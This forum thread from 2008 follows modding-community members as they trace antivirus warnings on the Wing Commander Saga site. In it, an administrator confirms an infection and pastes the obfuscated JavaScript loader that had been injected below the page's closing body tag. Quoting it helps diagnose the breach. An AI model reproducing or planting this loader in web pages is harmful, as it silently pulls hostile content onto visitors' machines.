Author Topic: Exploit site  (Read 7502 times)

Offline Talon 1024

• How do you turn this on?
    • Mods, Games, and Stuff
Whenever I click on my Project Badge that links to wcsaga.hard-light.net, Firefox pops up an AVG warning that says "Exploit link to known exploit site" and it doesn't show what it is supposed to show.  Seriously, what the hell? I've never known HLP to be an exploit site!

EDIT: It does it in IE too.

FYI I'm using AVG Anti-Virus 8

Also, when I deactivate the Active Surf-Shield, it pops up an error message saying "Virus identified JS/Downloader.Agent"
« Last Edit: July 26, 2008, 04:50:57 pm by Talon 1024 »
To understand religion, you need to understand morality first. | WCSaga website | WCSaga Forum | 158th website | 158th forum | Project Leader: WC: Hostile Frontier | WCHF Thread at CIC | Wing Blender | Twist of Fate | Multipart turrets on angled surfaces, tutorial included. | My Google Drive stuff | To convert speeds from WC to WCS, multiply both the cruise speed and the Afterburner speed by 0.15625 (5/32)

FS2 Mods I'm waiting on: Inferno 10th Anniversary
Current Project: Contestant Android app, Learn4Life iOS app, Blender Commander (importer).
The FreeSpace Font Foundry is back in action!

Offline blackhole

• Still not over the rainbow
  • Destiny can suck it
    • Black Sphere Studios
Where's Carl?

<_<

>_>

Offline Herra Tohtori

• The Academic
  • Bad command or file name
Likely false positives in the definitions file...

A while ago there was an issue with Avast! giving false positives about every phpBB forum having some trojan/malware (VBS or something); they eventually cleared it from the definitions file and haven't had problems with it since. With high probability it's something similar in this case... perhaps go and check AVG forums for false positive reports like this, and if there is no reports, perhaps report it as false positive, it'll likely be fixed by the next definitons file update or if not that, soon anyways.

I'm pretty sure that HLP is not a really known exploit site... :p
There are three things that last forever: Abort, Retry, Fail - and the greatest of these is Fail.

Offline Polpolion

• The sizzle, it thinks!

I have firefox and AVG and everything works fine for me.
Fun while it lasted.

Then bitter.

Offline FUBAR-BDHR

• Self-Propelled Trouble Magnet
  • Master Drunk
    • 165th Beer Drinking Hell Raisers
Maybe that virus, trojan or whatever it is is already on your computer and trying to redirect you somewhere else.
No-one ever listens to Zathras. Quite mad, they say. It is good that Zathras does not mind. He's even grown to like it. Oh yes. -Zathras

Offline Talon 1024

• Mods, Games, and Stuff
Maybe that virus, trojan or whatever it is is already on your computer and trying to redirect you somewhere else.

It doesn't matter what computer I'm using...  It still does it, regardless.
« Last Edit: July 26, 2008, 04:51:24 pm by Talon 1024 »
To understand religion, you need to understand morality first. | WCSaga website | WCSaga Forum | 158th website | 158th forum | Project Leader: WC: Hostile Frontier | WCHF Thread at CIC | Wing Blender | Twist of Fate | Multipart turrets on angled surfaces, tutorial included. | My Google Drive stuff | To convert speeds from WC to WCS, multiply both the cruise speed and the Afterburner speed by 0.15625 (5/32)

Current Project: Contestant Android app, Learn4Life iOS app, Blender Commander (importer).

What protection level is AVG at?

|[===---(-         
    ||
 =(||==)_
    ||_____|
 =(||==)
    ||                   
    |[===---(-                             

"Take my love. Take my land. Take me where I cannot stand. I don't care, I'm still free. You can't take the sky from me. Take me out to the black, tell them I ain't comin' back. Burn the land boil the sea, you can't take the sky from me. There's no place I can be since I've found Serenity. But you can't take the sky from me." - Ballad of Serenity

Oh Oh..... i'm getting that too with AVG, it appears to be Saga's site.

Strange, doesn't do it for me, but with Starmans it does.  :blah:
That's cool and ....disturbing at the same time o_o  - Vasudan Admiral

"Don't play games with me. You just killed someone I like, that is not a safe place to stand. I'm the Doctor. And you're in the biggest library in the universe. Look me up."

"Quick everyone out of the universe now!"

Wait, it happens for you too, Scoob?

|[===---(-         
    ||
 =(||==)_
    ||_____|
 =(||==)
    ||                   
    |[===---(-                             

"Take my love. Take my land. Take me where I cannot stand. I don't care, I'm still free. You can't take the sky from me. Take me out to the black, tell them I ain't comin' back. Burn the land boil the sea, you can't take the sky from me. There's no place I can be since I've found Serenity. But you can't take the sky from me." - Ballad of Serenity

ya and i'm using opera too

Code: [Select]
Virus identified JS/Downloader.Agent

"Don't play games with me. You just killed someone I like, that is not a safe place to stand. I'm the Doctor. And you're in the biggest library in the universe. Look me up."

Offline FUBAR-BDHR

• Master Drunk
Well I just updated my AVG and went to WCSaga and no virus warning here.
No-one ever listens to Zathras. Quite mad, they say. It is good that Zathras does not mind. He's even grown to like it. Oh yes. -Zathras

Click on Talon's avatar and see.

It works just fine for me. It seems to be a problem with Java Script. Check out settings and see if you can unblock wcsaga's website.

|[===---(-         
    ||
 =(||==)_
    ||_____|
 =(||==)
    ||                   
    |[===---(-                             

Offline FUBAR-BDHR

• Master Drunk

Click on Talon's avatar and see.

That is what I tried last night actually.

Offline Tolwyn

• The Admiral
  • Administrator
  • Ridiculously Old Fraud
    • Wing Commander Saga
You aren't, by any chance, refering the redirect site hosted on hlp?
Wing Commander Saga: A Legend Is Reborn | WingCenter

Tolwyn’s reputation for risk taking with other people’s lives was considered  to understate the facts. The admiral’s willingness to sacrifice anyone or anything to achieve his objectives had long been lauded in the popular press. He was “the man who got things done”.- Colonel Blair

No errors, no random CTDs, just pure fun and proof of why getting hit with missiles is a bad thing.
-WC Saga's beta tester

Report Wing Commander Saga bugs with Mantis

Offline Talon 1024

• Mods, Games, and Stuff
You aren't, by any chance, refering the redirect site hosted on hlp?

Umm, yeah.  I was referring to wcsaga.hard-light.net.

Offline Tolwyn

• The Admiral
  • Administrator
  • Ridiculously Old Fraud
    • Wing Commander Saga
You are right. There was an IE exploit.

I can see only one explanation: somebody accessed the ftp from an infected pc. The virus added following line below the </body> html tag.

Code: [Select]
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else
                                                                                                                                                                                                                                                                                  if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
Wing Commander Saga: A Legend Is Reborn | WingCenter

Tolwyn’s reputation for risk taking with other people’s lives was considered  to understate the facts. The admiral’s willingness to sacrifice anyone or anything to achieve his objectives had long been lauded in the popular press. He was “the man who got things done”.- Colonel Blair

No errors, no random CTDs, just pure fun and proof of why getting hit with missiles is a bad thing.
-WC Saga's beta tester

Report Wing Commander Saga bugs with Mantis

Offline colecampbell666

• I See Dead Pictures
  • Evolution and ascension.
Is it fixed? I don't get anything with FF (AVG 7.5 Free)
Gettin' back to dodgin' lasers.

me neither. but does that mean we're infected now or something?
Fun while it lasted.

Then bitter.